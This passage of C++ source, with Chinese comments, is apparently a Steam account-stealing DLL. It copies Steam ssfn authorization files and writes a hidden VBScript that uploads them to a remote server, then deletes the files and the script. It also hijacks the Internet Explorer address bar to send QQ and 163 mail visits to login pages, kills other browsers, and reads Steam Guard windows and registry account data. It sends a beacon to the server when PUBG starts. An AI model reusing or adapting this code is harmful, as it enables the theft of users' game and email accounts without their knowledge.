dwTrySize, dwEntrySize = 4096; // start buffer sizeHANDLE hCacheDir = NULL;DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;do{switch (dwError){// need a bigger buffercase ERROR_INSUFFICIENT_BUFFER:delete [] lpCacheEntry;lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];lpCacheEntry->dwStructSize = dwEntrySize;dwTrySize = dwEntrySize;BOOL bSuccess;if (hCacheDir == NULL)bSuccess = (hCacheDir= FindFirstUrlCacheEntry(NULL, lpCacheEntry,&dwTrySize)) != NULL;elsebSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);if (bSuccess)dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// we are donecase ERROR_NO_MORE_ITEMS:bDone = TRUE;bResult = TRUE;break;// we have got an entrycase ERROR_SUCCESS:// don't delete cookie entryif (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);// get ready for next entrydwTrySize = dwEntrySize;if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// unknown errordefault:bDone = TRUE;break;}if (bDone){delete []lpCacheEntry;if (hCacheDir)FindCloseUrlCache(hCacheDir);}} while (!bDone);return TRUE;
}// 删除授权文件模块BOOL DllExport SearchFilesByWildcard_1(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile = INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString mySSFNFiles = "";hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);if(INVALID_HANDLE_VALUE == hFile){return FALSE;}if(pNextInfo.cFileName[0] != '.'){mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, &pNextInfo)){if(pNextInfo.cFileName[0] == '.'){continue;}mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}return FALSE;
}// 上传 并 删除 授权文件模块BOOL DllExport SearchFilesByWildcard_2(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile = INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString myLP;CString myVBSFilePath;CString mySSFNFiles = "", myTXTSSFNFiles = "", mySSFNFilesName = "";myLP = szLocalLP;CString myUploadVBS = "";myUploadVBS += "Class XMLUpload \r\n";myUploadVBS += "Private xmlHttp \r\n";myUploadVBS += "Private objTemp \r\n";myUploadVBS += "Private adTypeBinary, adTypeText \r\n";myUploadVBS += "Private strCharset, strBoundary \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub Class_Initialize() \r\n";myUploadVBS += "adTypeBinary = 1 \r\n";myUploadVBS += "adTypeText = 2 \r\n";myUploadVBS += "Set xmlHttp = CreateObject(\"Msxml2.XMLHTTP\") \r\n";myUploadVBS += "Set objTemp = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objTemp.Type = adTypeBinary \r\n";myUploadVBS += "objTemp.Open \r\n";myUploadVBS += "strCharset = \"utf-8\" \r\n";myUploadVBS += "strBoundary = GetBoundary() \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub Class_Terminate() \r\n";myUploadVBS += "objTemp.Close \r\n";myUploadVBS += "Set objTemp = Nothing \r\n";myUploadVBS += "Set xmlHttp = Nothing \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Function StringToBytes(ByVal strData, ByVal strCharset) \r\n";myUploadVBS += "Dim objFile \r\n";myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objFile.Type = adTypeText \r\n";myUploadVBS += "objFile.Charset = strCharset \r\n";myUploadVBS += "objFile.Open \r\n";myUploadVBS += "objFile.WriteText strData \r\n";myUploadVBS += "objFile.Position = 0 \r\n";myUploadVBS += "objFile.Type = adTypeBinary \r\n";myUploadVBS += "If UCase(strCharset) = \"UNICODE\" Then \r\n";myUploadVBS += "objFile.Position = 2 'delete UNICODE BOM \r\n";myUploadVBS += "ElseIf UCase(strCharset) = \"UTF-8\" Then \r\n";myUploadVBS += "objFile.Position = 3 'delete UTF-8 BOM \r\n";myUploadVBS += "End If \r\n";myUploadVBS += "StringToBytes = objFile.Read(-1) \r\n";myUploadVBS += 
"objFile.Close \r\n";myUploadVBS += "Set objFile = Nothing \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Function GetFileBinary(ByVal strPath) \r\n";myUploadVBS += "Dim objFile \r\n";myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objFile.Type = adTypeBinary \r\n";myUploadVBS += "objFile.Open \r\n";myUploadVBS += "objFile.LoadFromFile strPath \r\n";myUploadVBS += "GetFileBinary = objFile.Read(-1) \r\n";myUploadVBS += "objFile.Close \r\n";myUploadVBS += "Set objFile = Nothing \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Function GetBoundary() \r\n";myUploadVBS += "Dim ret(12) \r\n";myUploadVBS += "Dim table \r\n";myUploadVBS += "Dim i \r\n";myUploadVBS += "table = \"abcdefghijklmnopqrstuvwxzy0123456789\" \r\n";myUploadVBS += "Randomize \r\n";myUploadVBS += "For i = 0 To UBound(ret) \r\n";myUploadVBS += "ret(i) = Mid(table, Int(Rnd() * Len(table) + 1), 1) \r\n";myUploadVBS += "Next \r\n";myUploadVBS += "GetBoundary = \"---------------------------\" & Join(ret, Empty) \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Property Let Charset(ByVal strValue) \r\n";myUploadVBS += "strCharset = strValue \r\n";myUploadVBS += "End Property \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Sub AddForm(ByVal strName, ByVal strValue) \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"\\r\\n\\r\\n$3\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$3\", strValue) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Sub AddFile(ByVal strName, ByVal strFileName, ByVal strFileType, ByVal 
strFilePath) \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"; filename=\"\"$3\"\"\\r\\nContent-Type: $4\\r\\n\\r\\n\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$3\", strFileName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$4\", strFileType) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "objTemp.Write GetFileBinary(strFilePath) \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub AddEnd() \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1--\\r\\n\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "objTemp.Position = 2 \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Function Upload(ByVal strURL) \r\n";myUploadVBS += "Call AddEnd \r\n";myUploadVBS += "xmlHttp.Open \"POST\", strURL, False \r\n";myUploadVBS += "xmlHttp.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=\" & strBoundary \r\n";myUploadVBS += "xmlHttp.Send objTemp \r\n";myUploadVBS += "Upload = xmlHttp.responseText \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "End Class \r\n";myUploadVBS += "";myUploadVBS += "Dim UploadData \r\n";myUploadVBS += "Dim UploadState \r\n";myUploadVBS += "Set UploadData = New XMLUpload \r\n";myUploadVBS += "UploadData.Charset = \"utf-8\" \r\n";myUploadVBS += "UploadData.AddForm \"content\", \"Hello world\" \r\n";myUploadVBS += "UploadData.AddFile \"image\", \"%s\", \"text/txt\", \"c:/%s\" \r\n";myUploadVBS += "UploadState = UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";myUploadVBS += "If UploadState = 
\"FILES_UPLOAD_OK\" Then \r\n";myUploadVBS += "	\r\n";myUploadVBS += "Else \r\n";myUploadVBS += "	WScript.sleep 10000 \r\n";myUploadVBS += "	UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";myUploadVBS += "End If \r\n";myUploadVBS += "Set UploadData = Nothing \r\n";myUploadVBS += "Set objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\n";myUploadVBS += "objFSO.DeleteFile(\"c:/%s\") \r\n";myUploadVBS += "objFSO.DeleteFile(WScript.ScriptFullName) \r\n";myUploadVBS += "Set objFSO = Nothing \r\n";hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);if(INVALID_HANDLE_VALUE == hFile){return FALSE;}if(pNextInfo.cFileName[0] != '.'){myVBSFilePath = "";myVBSFilePath += szMyselfPath;myVBSFilePath += GetName();myVBSFilePath += "64.VBS";mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS = "";szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fp=fopen(myVBSFilePath, "w");if(fp){fprintf(fp, "%s", szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, &pNextInfo)){if(pNextInfo.cFileName[0] == '.'){continue;}myVBSFilePath = "";myVBSFilePath += szMyselfPath;myVBSFilePath += GetName();myVBSFilePath += "64.VBS";mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS = "";szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, 
szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fp=fopen(myVBSFilePath, "w");if(fp){fprintf(fp, "%s", szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}return FALSE;
}// 数据发送模块BOOL DllExport SendURLPost(CString strPostStr)
{HMODULE hshell;hshell=LoadLibrary(_T("wininet.dll"));HINSTANCE (WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE (WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE (WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell,"InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell,"InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell,"InternetCloseHandle");HINTERNET hropen=XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if( hropen == NULL ){FreeLibrary(hshell);return FALSE;}HINTERNET hropenurl = XXXInternetOpenUrl(hropen, strPostStr, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if( hropenurl == NULL ){FreeLibrary(hshell);return FALSE;}XXXInternetCloseHandle(hropen);XXXInternetCloseHandle(hropenurl);FreeLibrary(hshell);return TRUE;
}// 劫持 IE 线程模块static DWORD WINAPI HOOKBrowser(LPVOID pParam)
{//AfxMessageBox("劫持 IE 线程模块启动!");do{CString szMyClass = "";HWND Hwnd_IEFrame = ::GetForegroundWindow();TCHAR szClassName[MAX_PATH]={0};ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_IEFrame, szClassName, MAX_PATH);szMyClass.Format(TEXT("%s"), szClassName);szMyClass.Replace(" ", "");if(szMyClass == "IEFrame"){//AfxMessageBox("IEFrame Class");HWND Hwnd_1 = ::FindWindowEx(Hwnd_IEFrame, NULL, _T("WorkerW"), NULL);if(Hwnd_1 != NULL){HWND Hwnd_2 = ::FindWindowEx(Hwnd_1, NULL, _T("ReBarWindow32"), NULL);if(Hwnd_2 != NULL){HWND Hwnd_3 = ::FindWindowEx(Hwnd_2, NULL, _T("Address Band Root"), NULL);if(Hwnd_3 != NULL){HWND Hwnd_4 = ::FindWindowEx(Hwnd_3, NULL, _T("ToolbarWindow32"), NULL);HWND Hwnd_5 = ::FindWindowEx(Hwnd_3, NULL, _T("Edit"), NULL);if(Hwnd_4 != NULL && Hwnd_5 != NULL){TCHAR szGetEditStr[MAX_PATH]={0};CString szMyEditStr1 = "", szMyEditStr2 = "";ZeroMemory(szGetEditStr, MAX_PATH * sizeof(TCHAR));::SendMessage(Hwnd_5, WM_GETTEXT, MAX_PATH, (LPARAM)szGetEditStr);//AfxMessageBox(szGetEditStr);szMyEditStr1.Format(_TEXT("%s"), szGetEditStr);szMyEditStr1.Replace("//", "`");AfxExtractSubString(szMyEditStr2, szMyEditStr1, 0, '/');szMyEditStr2.Replace("`", "//");CString szEditReplace;if( szMyEditStr2 == "http://mail.qq.com" || szMyEditStr2 == "https://mail.qq.com" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace = TEXT("https://ui.ptlogin2.qq.com/cgi-bin/login?style=9&appid=522005705&daid=4&s_url=https%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3D&hln_css=http%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.png&low_login=1&hln_autologin=%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81&pt_no_onekey=1");char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( 
WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else if( szMyEditStr2 == "https://mail.163.com" || szMyEditStr2 == "https://mail.126.com"  || szMyEditStr2 == "https://mail.yeah.net" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace.Format(TEXT("https://email.163.com/"));char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else if( szMyEditStr2 == "https://www.188.com" || szMyEditStr2 == "https://188.com" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace.Format(TEXT("https://vip.188.com/webapp/login188.html"));char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else{szMailAddr = "";szMailAddr = szMyEditStr2;}}}}}}Sleep(100);} while( !szBrowser );return 0;
}// 锁定注册表默认浏览器 并 劫持非IE内核浏览器 线程模块static DWORD WINAPI HOOKIERegedit(LPVOID pParam)
{//AfxMessageBox("线程模块启动!");do{if( GetProcess("360se.exe") && GetProcess("steam.exe") ){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){goto myOtherFunction;}else{if( KillProcess("360se.exe") ){if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}}else if( GetProcess("360chrome.exe") && GetProcess("steam.exe") ){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){goto myOtherFunction;}else{if( KillProcess("360chrome.exe") ){if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}}else{goto myOtherFunction;}myOtherFunction:if( GetProcess("steam.exe") ){HWND Hwnd_Browser = ::GetForegroundWindow();TCHAR szClassName[MAX_PATH];ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Browser, szClassName, MAX_PATH);CString szMyClass = "";szMyClass.Format(TEXT("%s"), szClassName);int sz360Class = szMyClass.Find("360se6_Frame", 0);int szChromeClass = szMyClass.Find("WidgetWin_1", 0);int szChromeClass_WidgetWin = szMyClass.Find("Chrome_WidgetWin_1", 0);int szQQBrowserClass_WidgetWin = szMyClass.Find("QQBrowser_WidgetWin_0", 0);if( sz360Class >= 0 || szChromeClass_WidgetWin >= 0 || szChromeClass >= 0 || szQQBrowserClass_WidgetWin >= 0 ){DWORD processid;::GetWindowThreadProcessId(Hwnd_Browser, &processid);HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processid);if(hprocess != NULL){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){DWORD cbNeededx = 0;HMODULE hModx = NULL;if( ::EnumProcessModules( hprocess, &hModx, sizeof( hModx ), &cbNeededx ) !=0 ){TCHAR myBrowserPath[MAX_PATH + 1] = 
{0};if( ::GetModuleFileNameEx( hprocess, hModx, myBrowserPath, MAX_PATH ) !=0 ){CString szBrowserPath;szBrowserPath.Format(TEXT(" /c \"%s\" https://w.mail.qq.com"), myBrowserPath);//AfxMessageBox("szBrowserPath:\n"+szBrowserPath);::TerminateProcess(hprocess, 0);ShellExecute(NULL, "open", "cmd.exe", szBrowserPath, "", SW_HIDE);}}}else{::TerminateProcess(hprocess, 0);if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}::CloseHandle(hprocess);}}Sleep(100);} while( !szIERegedit );return 0;
}// 监控 Tslgame 主界面 线程模块static DWORD WINAPI HOOKGameMain(LPVOID pParam)
{//AfxMessageBox("监控 Tslgame 主界面 线程 已启动!");szTslgameEXE = FALSE;do{HWND Hwnd_Tslgame = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Tslgame, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass = szMySTClass.Find("UnrealWindow", 0);if( GetProcess("TslGame.exe") && isSTClass >= 0 ){//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);//AfxMessageBox("已登录 Tslgame 主界面!");// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%scj.php?ID=%s&CJ=0"), strMailServerName, szMailID);//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){szTslgameEXE = true;}}}else{if( !GetProcess("steam.exe") ){szTslgameEXE = true;}}Sleep(100);} while( !szTslgameEXE );return 0;
}// 监控 Steam 主界面 线程模块static DWORD WINAPI HOOKLoginMain(LPVOID pParam)
{//AfxMessageBox("监控 steam.exe 主界面 线程 已启动!");BOOL szLoginEXE = FALSE;do{if( ::GetCurrentProcessId() == GetEXE() ){HWND Hwnd_Steam = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass1 = szMySTClass.Find("PopupWindow", 0);int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";szStyle1.Format(TEXT("%X"), lstyle1);szStyle2.Format(TEXT("%X"), lstyle2);szStyle3.Format(TEXT("%X"), lstyle3);szStyle4.Format(TEXT("%X"), lstyle4);if( (isSTClass2 >= 0 || isSTClass1 >= 0) && (szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") ){//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);//AfxMessageBox("开始判断是否已登录Steam主界面!");///// 处理电脑授权文件CString mySTInstPath = "", mySTSSFNFilePath = "";HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );mySTInstPath.Format(TEXT("%s"), dw_data);mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, 
mySSFNFilex);szTslgameEXE = true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); szBrowser = true;szLoginEXE = true;szEMailName = false;szIERegedit = true;}}else{if( !GetProcess("steam.exe") ){szBrowser = true;szLoginEXE = true;szEMailName = false;szIERegedit = true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 监控 登陆器界面 线程模块static DWORD WINAPI HOOKLoginEXE(LPVOID pParam)
{//AfxMessageBox("监控 steam.exe 登陆器 线程 已启动!");BOOL szLoginEXE = FALSE;do{if(::GetCurrentProcessId() == GetEXE()){HWND H_wnd = ::GetForegroundWindow();char sTitles[256];memset(sTitles, 0, 256);::SendMessage(H_wnd, WM_GETTEXT, 255, (LPARAM)sTitles);char *LP1;LP1 = strstr(sTitles, "Steam 令牌");char *LP2;LP2 = strstr(sTitles, "Steam  令牌");char *LP3;LP3 = strstr(sTitles, "Steam Guard");char *LP4;LP4 = strstr(sTitles, "Steam  Guard");char *LP5;LP5 = strstr(sTitles, "S t e a m 令牌");char *LP6;LP6 = strstr(sTitles, "S t e a m  令牌");char *LP7;LP7 = strstr(sTitles, "令牌");if( LP1 || LP2 || LP3 || LP4 || LP5 || LP6 || LP7 ){//AfxMessageBox("开始判断令牌种类!");long lstyle1 = GetWindowLong(H_wnd, GWL_STYLE);long lstyle2 = GetWindowLong(H_wnd, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(H_wnd, GWL_STYLE);long lstyle4 = GetWindowLongPtr(H_wnd, GWL_EXSTYLE);CString szLP1 = "", szLP2 = "", szLP3 = "", szLP4 = "";szLP1.Format(TEXT("%X"), lstyle1);szLP2.Format(TEXT("%X"), lstyle2);szLP3.Format(TEXT("%X"), lstyle3);szLP4.Format(TEXT("%X"), lstyle4);//AfxMessageBox("窗口样式:"+szLP1+"\n扩展样式:"+szLP2);if( szLP1 == "960A0000" || szLP1 == "96CA0000" || szLP3 == "960A0000" || szLP3 == "96CA0000" ){//AfxMessageBox("邮箱令牌");szLocalLP = "0";}else if( szLP1 == "960F0000" || szLP1 == "96CF0000" || szLP3 == "960F0000" || szLP3 == "96CF0000" ){//AfxMessageBox("手机令牌");szLocalLP = "1";}else{//AfxMessageBox("未知令牌");szLocalLP = "2";}HKEY hKey, xKey;LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char user[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;LONG lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)user, &dwLength );if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 ){CString LocalUser = "";CString ReadRegUser = "";LocalUser.Format(TEXT("%s"), user);ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, 
KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet2 == ERROR_SUCCESS ){char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;LONG lRet3 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &dwType1, (LPBYTE)data1, &dwLength1 );LONG lRet4 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );LONG lRet5 = RegQueryValueEx( xKey, TEXT("AccSecond"), NULL, &dwType3, (LPBYTE)data3, &dwLength3 );LONG lRet6 = RegQueryValueEx( xKey, TEXT("DataSecond"), NULL, &dwType4, (LPBYTE)data4, &dwLength4 );if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) ){CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";szRegAccOne.Format(TEXT("%s"), data1);szRegDataOne.Format(TEXT("%s"), data2);szRegAccSecon.Format(TEXT("%s"), data3);szRegDataSecon.Format(TEXT("%s"), data4);/// 随机生成 16位 KEYtime_t seed = time(NULL); srand((unsigned)seed);int randNum = (rand()*2);CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";szMD5Key += "_CHWM_";int szMD5Key_Len = szMD5Key.GetLength();for(int j=szMD5Key_Len; j<16 ;j++){int randNum = rand()%26;if(j%2){szMD5.Format("%C", randNum+97);}else{szMD5.Format("%C", randNum+65);}szMD5Key += szMD5;Sleep(50);}szMD5Key = gen(szMD5Key);Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, 